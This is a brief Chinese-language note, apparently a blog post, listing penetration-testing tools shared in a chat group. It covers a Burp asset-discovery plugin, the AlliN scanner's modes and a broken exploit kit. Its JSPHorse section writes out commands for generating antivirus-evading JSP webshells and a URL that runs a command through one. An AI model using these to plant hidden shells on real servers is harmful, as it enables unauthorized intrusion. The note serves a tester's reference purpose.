整理一下这几天群里蹲到师傅们分享的工具
domain hunter pro
这是一个bp的插件,只需使用br提供的代理访问网站就可以实现资产的自动挖掘功能,
还整合了一些右键快捷菜单,导出功能和一些工具
JSPHorse
这个算是利用工具,用来生成jsp的免杀马的
生成标准形式基础Webshell
1 | java -jar JSPHorse.jar -p your_password |
生成蚁剑的免杀Webshell
1 | java -jar JSPHorse.jar -p your_password --ant |
全局Unicode编码(JSP支持全局Unicode编码)
1 | java -jar JSPHorse.jar -p your_password -u |
生成进阶版Webshell(Javac动态编译class)
1 | java -jar JSPHorse.jar -p your_password --super |
进阶版Webshell基础上全局Unicode编码
1 | java -jar JSPHorse.jar -p your_password --super -u |
使用ScriptEngine调用JS免杀
1 | java -jar JSPHorse.jar -p your_password --js |
使用ScriptEngine调用JS免杀基础上全局Unicode编码
1 | java -jar JSPHorse.jar -p your_password --js -u |
如何使用?
1.jsp?pwd=your_password&cmd=calc.exe
Allin
一个辅助平常渗透测试项目或者攻防项目快速打点的综合工具
常用的参数记录一下,具体的直接-h就能看
1 | python AlliN.py --host "xxx.com" -m infoscan |
-m支持的参数有
- infoscan 扫信息
- fscan 用fofa配合-q参数,参数内容是fofa语法
- pscan 扫端口
- tscan 扫标题,默认
- subscan 子域名
- backscan 后台
- oxid 目标主机网卡
LiqunKit
这本来是一个漏洞利用的工具,但这个jar包不知为什么没跑起来,试了半天,看了issue有和我一样的问题,但我java版本也是1.8的,jar包名字也没修改过不知道为什么会不行,提个issue问下吧